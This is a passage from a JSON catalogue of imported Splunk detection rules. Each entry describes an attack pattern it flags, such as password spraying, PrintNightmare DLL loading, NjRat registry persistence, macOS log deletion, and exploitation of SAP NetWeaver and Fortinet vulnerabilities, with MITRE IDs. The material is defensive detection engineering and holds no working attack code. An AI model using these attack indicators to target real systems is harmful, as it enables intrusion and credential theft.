"source": "splunk/security_content", "source_id": "a4f39755-b1e2-40bb-b2dc-4449c45b0bf2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_accessdenied_discovery_events.yml" } }, { "id": "splunk-security-content-a511426e-184f-4de6-8711-cfd2af29d1e1", "type": "detection", "name": "Okta Multiple Accounts Locked Out", "description": "The following analytic detects multiple Okta accounts being locked out within a short period. It uses the user.account.lock event from Okta logs, aggregated over a 5-minute window, to identify this behavior. This activity is significant as it may indicate a brute force or password spraying attack, where an adversary attempts to guess passwords, leading to account lockouts. If confirmed malicious, this could result in potential account takeovers or unauthorized access to sensitive Okta accounts, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-accounts-locked-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a511426e-184f-4de6-8711-cfd2af29d1e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_accounts_locked_out.yml" } }, { "id": "splunk-security-content-a51bfe1a-94f0-4822-b1e4-16ae10145893", "type": "detection", "name": "Detect Outlook exe writing a zip file", "description": "The following analytic identifies the execution of `outlook.exe` writing a `.zip` file to the disk.\nIt leverages data from the Endpoint data model, specifically monitoring process and filesystem activities.\nThis behavior can be significant as it may indicate the use of Outlook to deliver malicious payloads or exfiltrate data via compressed files.\nIf confirmed malicious, this activity could lead to unauthorized data access, data exfiltration, or the delivery of malware, potentially compromising the security of the affected system and network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outlook-exe-writing-a-zip-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a51bfe1a-94f0-4822-b1e4-16ae10145893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml" } }, { "id": "splunk-security-content-a51bfe1a-94f0-48cc-b4e4-16a110145893", "type": "detection", "name": "Attacker Tools On Endpoint", "description": "The following analytic detects the execution of tools commonly exploited by cybercriminals, such as those used for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning system for potential security incidents, enabling prompt response. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1036.005", "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/attacker-tools-on-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a51bfe1a-94f0-48cc-b4e4-16a110145893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/attacker_tools_on_endpoint.yml" } }, { "id": "splunk-security-content-a520b1fe-cc9e-4f56-b762-18354594c52f", "type": "detection", "name": "AWS Successful Single-Factor Authentication", "description": "The following analytic identifies a successful Console Login authentication event for an AWS IAM user account without Multi-Factor Authentication (MFA) enabled. It leverages AWS CloudTrail logs to detect instances where MFA was not used during login. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. If confirmed malicious, an attacker could gain unauthorized access to the AWS environment, potentially leading to data exfiltration, resource manipulation, or further privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a520b1fe-cc9e-4f56-b762-18354594c52f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-a560e7f6-1711-4353-885b-40be53101fcd", "type": "detection", "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful single-factor authentication event against Azure Active Directory. It leverages Azure SignInLogs data, specifically focusing on events where single-factor authentication succeeded. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. If confirmed malicious, an attacker could gain unauthorized access to the account, potentially leading to data breaches, privilege escalation, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a560e7f6-1711-4353-885b-40be53101fcd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-a583b9f1-9c3a-4402-9441-b981654dea6c", "type": "detection", "name": "SAP NetWeaver Visual Composer Exploitation Attempt", "description": "Detects potential exploitation attempts targeting CVE-2025-31324, a critical unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer.\nThis flaw allows remote attackers to send specially crafted POST requests to the /developmentserver/metadatauploader endpoint, enabling arbitrary file uploads\u2014commonly webshells\u2014resulting in full system compromise.\nThe detection looks for HTTP HEAD or POST requests with a 200 OK status to sensitive Visual Composer endpoints, which may indicate reconnaissance or active exploitation.\nSuccessful exploitation can lead to attackers gaining privileged access, deploying malware, and impacting business-critical SAP resources.\nImmediate patching and investigation of suspicious activity are strongly recommended, as this vulnerability is being actively exploited in the wild.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sap-netweaver-visual-composer-exploitation-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a583b9f1-9c3a-4402-9441-b981654dea6c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/sap_netweaver_visual_composer_exploitation_attempt.yml" } }, { "id": "splunk-security-content-a5d85486-b89c-11eb-8267-acde48001122", "type": "detection", "name": "Allow Inbound Traffic In Firewall Rule", "description": "The following analytic detects a suspicious PowerShell command that allows inbound traffic to a specific local port within the public profile. It leverages PowerShell script block logging (EventCode 4104) to identify commands containing keywords like \"firewall,\" \"Inbound,\" \"Allow,\" and \"-LocalPort.\" This activity is significant because it may indicate an attacker attempting to establish remote access by modifying firewall rules. If confirmed malicious, this could allow unauthorized access to the machine, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-inbound-traffic-in-firewall-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5d85486-b89c-11eb-8267-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_inbound_traffic_in_firewall_rule.yml" } }, { "id": "splunk-security-content-a5e451f8-da81-11eb-b245-acde48001122", "type": "detection", "name": "Spoolsv Suspicious Loaded Modules", "description": "The following analytic detects the suspicious loading of DLLs by spoolsv.exe, potentially indicating PrintNightmare exploitation. It leverages Sysmon EventCode 7 to identify instances where spoolsv.exe loads multiple DLLs from the Windows System32 spool drivers x64 directory. This activity is significant as it may signify an attacker exploiting the PrintNightmare vulnerability to execute arbitrary code. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, and persistent access within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-suspicious-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5e451f8-da81-11eb-b245-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_suspicious_loaded_modules.yml" } }, { "id": "splunk-security-content-a5f5fe52-8e50-4fb0-ad1b-780be6c0d857", "type": "detection", "name": "MacOS Network Share Discovery", "description": "Identifies execution of network share enumeration commands (smbutil, showmount) that can be leveraged by adversaries to discover accessible SMB and NFS resources, supporting internal reconnaissance and potential lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-network-share-discovery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a5f5fe52-8e50-4fb0-ad1b-780be6c0d857", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_network_share_discovery.yml" } }, { "id": "splunk-security-content-a5fffbbd-271f-4980-94ed-4fbf17f0af1c", "type": "detection", "name": "Windows Njrat Fileless Storage via Registry", "description": "The following analytic detects suspicious registry modifications indicative of NjRat's fileless storage technique. It leverages the Endpoint.Registry data model to identify specific registry paths and values commonly used by NjRat for keylogging and executing DLL plugins. This activity is significant as it helps evade traditional file-based detection systems, making it crucial for SOC analysts to monitor. If confirmed malicious, this behavior could allow attackers to persist on the host, execute arbitrary code, and capture sensitive keystrokes, leading to potential data breaches and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-njrat-fileless-storage-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5fffbbd-271f-4980-94ed-4fbf17f0af1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_njrat_fileless_storage_via_registry.yml" } }, { "id": "splunk-security-content-a602d9a2-aaea-45f8-bf0f-d851168d61ca", "type": "detection", "name": "Windows PaperCut NG Spawn Shell", "description": "The following analytic detects instances where the PaperCut NG application (pc-app.exe) spawns a Windows shell, such as cmd.exe or PowerShell. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the parent process is pc-app.exe. This activity is significant as it may indicate an attacker attempting to gain unauthorized access or execute malicious commands on the system. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or further compromise of the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-papercut-ng-spawn-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a602d9a2-aaea-45f8-bf0f-d851168d61ca", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_papercut_ng_spawn_shell.yml" } }, { "id": "splunk-security-content-a6b3ab4e-dd77-4213-95fa-fc94701995e0", "type": "detection", "name": "Suspicious Reg exe Process", "description": "The following analytic identifies instances of reg.exe being launched from a command prompt (cmd.exe) that was not initiated by the user, as indicated by a parent process other than explorer.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names. This activity is significant because reg.exe is often used in registry manipulation, which can be indicative of malicious behavior such as persistence mechanisms or system configuration changes. If confirmed malicious, this could allow an attacker to modify critical system settings, potentially leading to privilege escalation or persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-reg-exe-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a6b3ab4e-dd77-4213-95fa-fc94701995e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_reg_exe_process.yml" } }, { "id": "splunk-security-content-a7093c28-796c-4ebb-9997-e2c18b870837", "type": "detection", "name": "Windows PowerView SPN Discovery", "description": "The following analytic detects the execution of the `Get-DomainUser` or `Get-NetUser` PowerShell cmdlets with the `-SPN` parameter, indicating the use of PowerView for SPN discovery. It leverages PowerShell Script Block Logging (EventCode=4104) to identify these specific commands. This activity is significant as it suggests an attempt to enumerate domain accounts associated with Service Principal Names (SPNs), a common precursor to Kerberoasting attacks. If confirmed malicious, this could allow an attacker to identify and target accounts for credential theft, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-spn-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7093c28-796c-4ebb-9997-e2c18b870837", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_spn_discovery.yml" } }, { "id": "splunk-security-content-a7131dae-34e3-11ec-a2de-acde48001122", "type": "detection", "name": "Gdrive suspicious file sharing", "description": "The following analytic identifies suspicious file-sharing activity on Google Drive, where internal users share documents with more than 50 external recipients. It leverages GSuite Drive logs, focusing on changes in user access and filtering for emails outside the organization's domain. This activity is significant as it may indicate compromised accounts or intentional data exfiltration. If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, data leaks, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gdrive-suspicious-file-sharing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7131dae-34e3-11ec-a2de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gdrive_suspicious_file_sharing.yml" } }, { "id": "splunk-security-content-a7539705-7183-4a12-9b6a-b6eef645a6d7", "type": "detection", "name": "Detect Password Spray Attack Behavior On User", "description": "The following analytic identifies any user failing to authenticate from 10 or more unique sources. This behavior could represent an adversary performing a Password Spraying attack to obtain initial access or elevate privileges. This logic can be used for real time security monitoring as well as threat hunting exercises. Environments can be very different depending on the organization. Test and customize this detections thresholds as needed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attack-behavior-on-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7539705-7183-4a12-9b6a-b6eef645a6d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_password_spray_attack_behavior_on_user.yml" } }, { "id": "splunk-security-content-a79b607a-50cc-4704-bb9d-eff280cb78c2", "type": "detection", "name": "ASL AWS Credential Access GetPasswordData", "description": "The following analytic identifiesGetPasswordData API calls in your AWS account. It leverages CloudTrail logs from Amazon Security Lake to detect this activity by counting the distinct instance IDs accessed. This behavior is significant as it may indicate an attempt to retrieve encrypted administrator passwords for running Windows instances, which is a critical security concern. If confirmed malicious, attackers could gain unauthorized access to administrative credentials, potentially leading to full control over the affected instances and further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-credential-access-getpassworddata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a79b607a-50cc-4704-bb9d-eff280cb78c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_credential_access_getpassworddata.yml" } }, { "id": "splunk-security-content-a7a7afdb-3c58-45b6-9bff-63e5acfd9d40", "type": "detection", "name": "Windows Modify Registry Default Icon Setting", "description": "The following analytic detects suspicious modifications to the Windows registry's default icon settings, a technique associated with Lockbit ransomware. It leverages data from the Endpoint Registry data model, focusing on changes to registry paths under \"*HKCR\\\\*\\\\defaultIcon\\\\(Default)*\". This activity is significant as it is uncommon for normal users to modify these settings, and such changes can indicate ransomware infection or other malware. If confirmed malicious, this could lead to system defacement and signal a broader ransomware attack, potentially compromising sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-default-icon-setting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7a7afdb-3c58-45b6-9bff-63e5acfd9d40", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_default_icon_setting.yml" } }, { "id": "splunk-security-content-a7da845d-6fae-41cf-b823-6c0b8c55814a", "type": "detection", "name": "Azure AD Privileged Authentication Administrator Role Assigned", "description": "The following analytic detects the assignment of the Privileged Authentication Administrator role to an Azure AD user. It leverages Azure Active Directory audit logs to identify when this specific role is assigned. This activity is significant because users in this role can set or reset authentication methods for any user, including those in privileged roles like Global Administrators. If confirmed malicious, an attacker could change credentials and assume the identity and permissions of high-privilege users, potentially leading to unauthorized access to sensitive information and critical configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-authentication-administrator-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7da845d-6fae-41cf-b823-6c0b8c55814a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_authentication_administrator_role_assigned.yml" } }, { "id": "splunk-security-content-a7e3f0f0-ae42-11eb-b245-acde48001122", "type": "detection", "name": "Executables Or Script Creation In Suspicious Path", "description": "The following analytic identifies the creation of executables or scripts in suspicious file paths on Windows systems. It leverages the Endpoint.Filesystem dataset to detect files with specific extensions (e.g., .exe, .dll, .ps1) created in uncommon directories (e.g., \\windows\\fonts\\, \\users\\public\\). This activity can be significant as adversaries often use these paths to evade detection and maintain persistence. If confirmed malicious, this behavior could allow attackers to execute unauthorized code, escalate privileges, or persist within the environment, posing a significant security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executables-or-script-creation-in-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7e3f0f0-ae42-11eb-b245-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executables_or_script_creation_in_suspicious_path.yml" } }, { "id": "splunk-security-content-a7f2e891-3c4d-4a1b-9e6f-2b8d0c5a1f3e", "type": "detection", "name": "MacOS Log Removal", "description": "Detects the deletion or modification of logs on MacOS systems by identifying execution of the rm command with command-line arguments referencing system.log or audit-related paths.\nAdversaries may remove or alter log files to cover their tracks and hinder detection and forensic analysis. This behavior commonly occurs during post-exploitation cleanup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-log-removal.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a7f2e891-3c4d-4a1b-9e6f-2b8d0c5a1f3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_log_removal.yml" } }, { "id": "splunk-security-content-a7fbbc4e-4571-424a-b627-6968e1c939e4", "type": "detection", "name": "Windows Domain Account Discovery Via Get-NetComputer", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetComputer, which is used to query Active Directory for user account details such as \"samaccountname,\" \"accountexpires,\" \"lastlogon,\" and more. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to gather user account information, which is often a precursor to further malicious actions. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-domain-account-discovery-via-get-netcomputer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7fbbc4e-4571-424a-b627-6968e1c939e4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_domain_account_discovery_via_get_netcomputer.yml" } }, { "id": "splunk-security-content-a83122f2-fa09-4868-a230-544dbc54bc1c", "type": "detection", "name": "Fortinet Appliance Auth bypass", "description": "The following analytic detects attempts to exploit CVE-2022-40684, a Fortinet appliance authentication bypass vulnerability.\nIt identifies REST API requests to the /api/v2/ endpoint using various HTTP methods (GET, POST, PUT, DELETE) that may indicate unauthorized modifications, such as adding SSH keys or creating new users.\nThis detection leverages the Web datamodel to monitor specific URL patterns and HTTP methods.\nThis activity is significant as it can lead to unauthorized access and control over the appliance.\nIf confirmed malicious, attackers could gain persistent access, reroute network traffic, or capture sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fortinet-appliance-auth-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a83122f2-fa09-4868-a230-544dbc54bc1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/fortinet_appliance_auth_bypass.yml" } }, { "id": "splunk-security-content-a85aa37e-9647-11ec-90c5-acde48001122", "type": "detection", "name": "Windows Raw Access To Disk Volume Partition", "description": "The following analytic detects suspicious raw access reads to the device disk partition of a host machine. It leverages Sysmon EventCode 9 logs to identify processes attempting to read or write to the boot sector, excluding legitimate system processes. This activity is significant as it is commonly associated with destructive actions by adversaries, such as wiping, encrypting, or overwriting the boot sector, as seen in attacks involving malware like HermeticWiper. If confirmed malicious, this behavior could lead to severe impacts, including system inoperability, data loss, or compromised boot integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raw-access-to-disk-volume-partition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a85aa37e-9647-11ec-90c5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raw_access_to_disk_volume_partition.yml" } }, { "id": "splunk-security-content-a87736a6-95cd-4728-8689-3c64d5026b3e", "type": "detection", "name": "Domain Group Discovery With Wmic", "description": "The following analytic identifies the execution of `wmic.exe` with command-line arguments used to query for domain groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gain situational awareness and map out Active Directory structures. If confirmed malicious, this behavior could allow attackers to identify and target specific domain groups, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-group-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a87736a6-95cd-4728-8689-3c64d5026b3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_group_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-a87cd633-076d-4ab2-9047-977751a3c1a0", "type": "detection", "name": "Azure AD New Federated Domain Added", "description": "The following analytic detects the addition of a new federated domain within an Azure Active Directory tenant. It leverages Azure AD AuditLogs to identify successful \"Set domain authentication\" operations. This activity is significant as it may indicate the use of the Azure AD identity 